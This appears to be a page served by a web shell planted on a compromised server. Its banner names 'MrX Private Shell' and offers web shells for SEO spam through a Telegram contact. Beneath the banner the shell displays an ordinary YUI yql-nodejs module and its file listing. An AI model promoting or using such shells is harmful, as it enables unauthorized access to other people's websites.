__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
YUI.add('yql-nodejs', function (Y, NAME) {
/**
* NodeJS plugin for YQL to use native request to make requests instead of JSONP.
* Not required by the user, it's conditionally loaded and should "just work".
* @module yql
* @submodule yql-nodejs
*/
var request = require('request');
//Over writes Y.YQLRequest._send to use request instead of JSONP
Y.YQLRequest.prototype._send = function (url, o) {
request(url, {
method: 'GET',
timeout: o.timeout || (30 * 1000)
}, function(err, res) {
if (err) {
//The signature that YQL requires
o.on.success({
error: err
});
} else {
o.on.success(JSON.parse(res.body));
}
});
};
}, '3.18.1', {"requires": ["yql"]});
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| yql-nodejs-debug.js | File | 772 B | 0777 |
|
| yql-nodejs-min.js | File | 252 B | 0777 |
|
| yql-nodejs.js | File | 772 B | 0777 |
|